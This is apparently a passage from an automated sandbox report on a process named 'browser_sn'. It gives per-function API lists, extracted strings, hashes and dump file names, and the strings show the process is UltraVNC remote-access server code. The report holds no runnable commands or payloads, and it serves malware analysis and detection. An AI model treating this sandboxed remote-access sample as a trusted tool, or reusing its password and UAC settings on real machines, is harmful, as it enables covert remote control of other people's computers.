                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: PrivateProfile$String$Write$Desktop$Threadwsprintf$FileModuleName$CloseCurrentErrorInputLastMessageOpen_errno_invalid_parameter_noinfo
                                                      • String ID: $AllowEditClients$AllowLoopback$AllowProperties$AllowShutdown$AuthHosts$AuthRequired$AutoPortSelect$Avilog$BlankInputsOnly$BlankMonitorEnabled$ConnectPriority$DSMPlugin$DSMPluginConfig$DebugLevel$DebugMode$DefaultScale$DisableTrayIcon$EnableDriver$EnableHook$EnableJapInput$EnableVirtual$FTUserImpersonation$FileTransferEnabled$HTTPConnect$HTTPPortNumber$IdleTimeout$InputsEnabled$LocalInputsDisabled$LockSetting$LoopbackOnly$MSLogonRequired$MaxCpu$NewMSLogon$OnlyPollConsole$OnlyPollOnEvent$Permission denied:Uncheck [_] Protect my computer... in run as dialog or use user with write permission.$PollForeground$PollFullScreen$PollUnderCursor$PortNumber$QueryAccept$QueryIfNoLogon$QuerySetting$QueryTimeout$RemoveAero$RemoveWallpaper$SingleWindow$SingleWindowName$SocketConnect$TurboMode$UltraVNC$UseDSMPlugin$UseRegistry$XDMCPConnect$accept_reject_mesg$admin$admin_auth$clearconsole$group1$group2$group3$kickrdp$locdom1$locdom2$locdom3$passwd$passwd2$path$poll$primary$secondary
                                                      • API String ID: 634683900-3478490838
                                                      • Opcode ID: 2effa7899f974a3009ccd12de8866d22f8568e5a4afa6748285aa8aa378eceda
                                                      • Instruction ID: 736614ea0d92d725ed9d2d912e67fae1aa94708fe677654b874bb90afc70b960
                                                      • Opcode Fuzzy Hash: 2effa7899f974a3009ccd12de8866d22f8568e5a4afa6748285aa8aa378eceda
                                                      • Instruction Fuzzy Hash: ECE2B571A29A4BE5EB64EF74E8505E8A370FB45B48FC06032D50D07A68DE7DF24AC760
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: PrivateProfile$String$Write$Desktopwsprintf$Thread$CloseCurrentErrorInputLastMessageOpen_callnewh_itowmallocxtoa
                                                      • String ID: $AllowEditClients$AllowLoopback$AllowProperties$AllowShutdown$AuthHosts$AuthRequired$AutoPortSelect$Avilog$BlankInputsOnly$BlankMonitorEnabled$ConnectPriority$DSMPlugin$DebugLevel$DebugMode$DefaultScale$DisableTrayIcon$EnableDriver$EnableHook$EnableJapInput$EnableVirtual$FTUserImpersonation$FileTransferEnabled$FileTransferTimeout$HTTPConnect$HTTPPortNumber$IdleTimeout$InputsEnabled$LocalInputsDisabled$LockSetting$LoopbackOnly$MSLogonRequired$MaxCpu$NewMSLogon$OnlyPollConsole$OnlyPollOnEvent$PollForeground$PollFullScreen$PollUnderCursor$PortNumber$QueryAccept$QueryIfNoLogon$QuerySetting$QueryTimeout$RemoveAero$RemoveWallpaper$SingleWindow$SingleWindowName$SocketConnect$TurboMode$UltraVNC$UseDSMPlugin$UseRegistry$XDMCPConnect$accept_reject_mesg$admin$admin_auth$clearconsole$group1$group2$group3$kickrdp$locdom1$locdom2$locdom3$passwd$passwd2$path$poll$primary$secondary
                                                      • API String ID: 341937111-959611688
                                                      • Opcode ID: 7e73647ecd3fa51fa072c6accf7da39f2f963580055068ff331c9971e3f9d7f8
                                                      • Instruction ID: 5246fa7ea587266e54e50168a0f137485f49a419236e9242701960b0275de963
                                                      • Opcode Fuzzy Hash: 7e73647ecd3fa51fa072c6accf7da39f2f963580055068ff331c9971e3f9d7f8
                                                      • Instruction Fuzzy Hash: 8FC2F965A28A0791EE64EB71E8905A5F370FB45B88FC06432D90D13B68EE7DF24DC760
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: DesktopOpen$Close$EventThread$HandleProcess$FileModuleNameUser$CreateCriticalCurrentErrorExecuteInformationInitializeInputLastObjectQuerySectionShellSleepTokenValueVersionWindow
                                                      • String ID: -softwarecadhelper$Ctrl-alt-del require service, no permission$Ctrl-alt-del require service, no permission$EnableLUA$Global\SessionEventUltraCad$SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System$UAC is Disable, make registry changes to allow cad$UltraVNC Warning$Warning$Winsta0\Default$cad.exe$open$vistahook.cpp : !GetUserObjectInformation $vistahook.cpp : OpenInputdesktop Error $vistahook.cpp : OpenInputdesktop OK$vistahook.cpp : SelectHDESK to %s (%x) from %x$vistahook.cpp : SelectHDESK:!SetThreadDesktop
                                                      • API String ID: 1732492099-311746058
                                                      • Opcode ID: 364b0ab4c0a733f657dae5b09393cd9c81dc3f4ffc649c11128cba260e889681
                                                      • Instruction ID: 130190df1564597f7469e8336f7cd8f775fcfcec3cc34c801e9275ea945c10ec
                                                      • Opcode Fuzzy Hash: 364b0ab4c0a733f657dae5b09393cd9c81dc3f4ffc649c11128cba260e889681
                                                      • Instruction Fuzzy Hash: 5EF15632A28B4285EB24EB31A8842E9B3A6FF45754F841236DA5D47BA4DF3CF544C720
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Window$Item$Move$Long$Text$DialogForegroundMessageRectSend_snprintf$InfoInvalidateLoadScrollShowString
                                                      • String ID: Chat with <%s> - UltraVNC$MS Sans Serif
                                                      • API String ID: 3122538718-446500584
                                                      • Opcode ID: 36d5dedeaafecd704d5ccace325cb0965bf20f8b169c0f54af0df3c2fc8c3945
                                                      • Instruction ID: ef50d7ae051716b062113851cb3d417d271edbba5d94b9b64561376b379fcc2b
                                                      • Opcode Fuzzy Hash: 36d5dedeaafecd704d5ccace325cb0965bf20f8b169c0f54af0df3c2fc8c3945
                                                      • Instruction Fuzzy Hash: 4FF17A71A2864286EB74EB36E4043A9B3A1FF89B94F905131CE0E47BA5CF7CF5498710
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CapsCompatibleCreateDeviceEnumErrorLastLibrary$AddressBitmapBitsDisplayFreeLoadProcSettingsWindows
                                                      • String ID: DISPLAY$EnumDisplayDevicesA$USER32$WinVNC$mv video hook driver2$vncDesktop : memory device doesn't support GetDIBitsWinVNC cannot be used with this graphics device driver$vncDesktop : root device doesn't support BitBltWinVNC cannot be used with this graphic device driver$vncdesktop.cpp : Failed m_rootdc $vncdesktop.cpp : No driver used $vncdesktop.cpp : bitmap dimensions are %d x %d$vncdesktop.cpp : created memory bitmap$vncdesktop.cpp : failed to DeleteDC hrootdc$vncdesktop.cpp : failed to create compatibleDC(%d)$vncdesktop.cpp : failed to create memory bitmap(%d)$vncdesktop.cpp : got bitmap format$vncdesktop.cpp : unable to get display colour info$vncdesktop.cpp : unable to get display format
                                                      • API String ID: 3851920378-1343955350
                                                      • Opcode ID: 64e6ac3a7bdcde4c20c39546ebbbec1b22000b0516b3881d6d9525ff59da856e
                                                      • Instruction ID: 98316b427450f67cd14041ffcd04970e8beb115d28bedc3f031f413a789c4081
                                                      • Opcode Fuzzy Hash: 64e6ac3a7bdcde4c20c39546ebbbec1b22000b0516b3881d6d9525ff59da856e
                                                      • Instruction Fuzzy Hash: 3B025A76A286C286EB24EF74D4506E9B7A1FF86B48F845436CA4D5B398DF3CE045C720
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CloseDesktop$CreateThread$DisplaySettings$ChangeLibraryValuewprintf$AddressCurrentEnumFreeInputLoadOpenProc
                                                      • String ID: Attach.ToDesktop$DEVICE0$DevNum:%dName:%sString:%sID:%sKey:%s$EnumDisplayDevicesA$No '%s' found.$SYSTEM$SYSTEM\CurrentControlSet\Hardware Profiles\Current$SYSTEM\CurrentControlSet\Hardware Profiles\Current\System\CurrentControlSet\Services\mv2$USER32$\DEVICE$mv video hook driver2$mv2
                                                      • API String ID: 4207610217-3713657650
                                                      • Opcode ID: cd3cd2c9535241abd372aab497dfb4bd752fa0a5a9763d12b3f41f1bb9d769e3
                                                      • Instruction ID: 0ef41a44bfb4f0e16894c928c5c736537a336b46cb761a2249b7fd4ed96db272
                                                      • Opcode Fuzzy Hash: cd3cd2c9535241abd372aab497dfb4bd752fa0a5a9763d12b3f41f1bb9d769e3
                                                      • Instruction Fuzzy Hash: 46C16062A29A8385EB70EB31A8502EEB3B5FF85784F845035DA4E57B94DF7CE109C710
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Delete$Object$Palette$ErrorLast$Select$CreateEntriesSystem$ColorCompatibleRealizeTable
                                                      • String ID: vncdesktop.cpp : framebuffer has %u palette entries$vncdesktop.cpp : initialised palette OK$vncdesktop.cpp : no palette data for truecolour display$vncdesktop.cpp : unable to allocate logical palette$vncdesktop.cpp : unable to create HPALETTE$vncdesktop.cpp : unable to create temporary DC$vncdesktop.cpp : unable to get system palette entries$vncdesktop.cpp : unable to restore temporary DC bitmap$vncdesktop.cpp : unable to select DIB section into temporary DC$vncdesktop.cpp : unable to select() HPALETTE$vncdesktop.cpp : unable to set DIB section palette$vncdesktop.cpp : warning - failed to RealizePalette
                                                      • API String ID: 463275814-2693335352
                                                      • Opcode ID: bac5f81a3a5e155526e90384c9b81cfe27e32c18590eb1aaea68509ec9771b6c
                                                      • Instruction ID: ab3bf992ab399c13a8a773fddcd9b704082c40565eee5026b690e8f0a6cccdec
                                                      • Opcode Fuzzy Hash: bac5f81a3a5e155526e90384c9b81cfe27e32c18590eb1aaea68509ec9771b6c
                                                      • Instruction Fuzzy Hash: 50A19065A28A8385FA34FB3594042FAA3A1FF86B58FD45431C94E57395DE3CF04AC760
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Desktop$Thread$CloseDisplayLibrarySettings$ChangeCreateFreewprintf$AddressCurrentEnumInputLoadOpenProcValue
                                                      • String ID: Attach.ToDesktop$DEVICE0$DevNum:%dName:%sString:%sID:%sKey:%s$EnumDisplayDevicesA$No '%s' found.$SYSTEM\CurrentControlSet\Hardware Profiles\Current\System\CurrentControlSet\Services\mv2$USER32$\DEVICE$mv video hook driver2$mv2
                                                      • API String ID: 27940619-3388178877
                                                      • Opcode ID: 0339ce360284387b53255601b05480dca21fa52ca98469070f8d84e277019744
                                                      • Instruction ID: c82cbb12e43c582b2ac58d48948389a29dec5fa31ac82abfc3f1b4a6c8e3ed5c
                                                      • Opcode Fuzzy Hash: 0339ce360284387b53255601b05480dca21fa52ca98469070f8d84e277019744
                                                      • Instruction Fuzzy Hash: 53C18D32A2868286EB70EF35A8402EAB7E2FF85794F845035DA4E57794DF3CE509C710
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AddressProc$Library$FileLoad$DeleteFreeModuleName
                                                      • String ID: Config$CreateIntegratedPluginInterface$CreatePluginInterface$Description$FreeBuffer$GetParams$Reset$RestoreBuffer$SetParams$Shutdown$Startup$TransformBuffer
                                                      • API String ID: 1650122287-1031704962
                                                      • Opcode ID: 2e3427beeea8e7963a578434a2b2276026c969c33777596d628f9c5fe35e2b15
                                                      • Instruction ID: 1c2055691a0517db854ff7e1a0aced8da2a12fc2ece738723002938ec4ec814d
                                                      • Opcode Fuzzy Hash: 2e3427beeea8e7963a578434a2b2276026c969c33777596d628f9c5fe35e2b15
                                                      • Instruction Fuzzy Hash: 7681EB32929A8291EB21AF34E4543EDB3B0FB99B58F845135DE5D4B394DF78E644C320
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Time$File$_errno$FindLocalSystem__doserrno$Closefree$DriveErrorFirstLastType_getdrive_invalid_parameter_noinfo_wsopen_s
                                                      • String ID: ./\
                                                      • API String ID: 385398445-3176372042
                                                      • Opcode ID: 5df5ab07e8b10f5b0de6cac4ab10895aae674884ac327e352a221a4cbdc82de0
                                                      • Instruction ID: 1dd954d9defc872407b6b4abb6ea6861bc22a2d74193815bf4174c271e22e9fa
                                                      • Opcode Fuzzy Hash: 5df5ab07e8b10f5b0de6cac4ab10895aae674884ac327e352a221a4cbdc82de0
                                                      • Instruction Fuzzy Hash: 2DE16F229282428AEB70AF31A0541BEF7A0FF46740F945035EA8E16B95DF7DF854DB20
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorLast$AddressLibraryLoadProcProcess$CreatePrivateProfile$BlockEnvironmentSleepUser$ActiveCloseConsoleCurrentDestroyFileHandleModuleNameOpenSessionStringVersion
                                                      • String ID: LockWorkStation$WinStationConnectW$Winsta0\Winlogon$h$user32.dll$winsta.dll
                                                      • API String ID: 2898369102-3720325205
                                                      • Opcode ID: a88697ad3902970c94e634d2ee006443711aca9222aabfc6e9aa9b8f1b329622
                                                      • Instruction ID: f5d72372207c9952d4b4e2a93cd216beb07ad18da24ac278315375dff91b968c
                                                      • Opcode Fuzzy Hash: a88697ad3902970c94e634d2ee006443711aca9222aabfc6e9aa9b8f1b329622
                                                      • Instruction Fuzzy Hash: B5A1F535A2CA8286EA74AF75A8442B9F2B5FF89740FC45035D98D42B64DF3CF445CB20
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Clipboard$CloseEmptyOpen
                                                      • String ID:
                                                      • API String ID: 1427272684-0
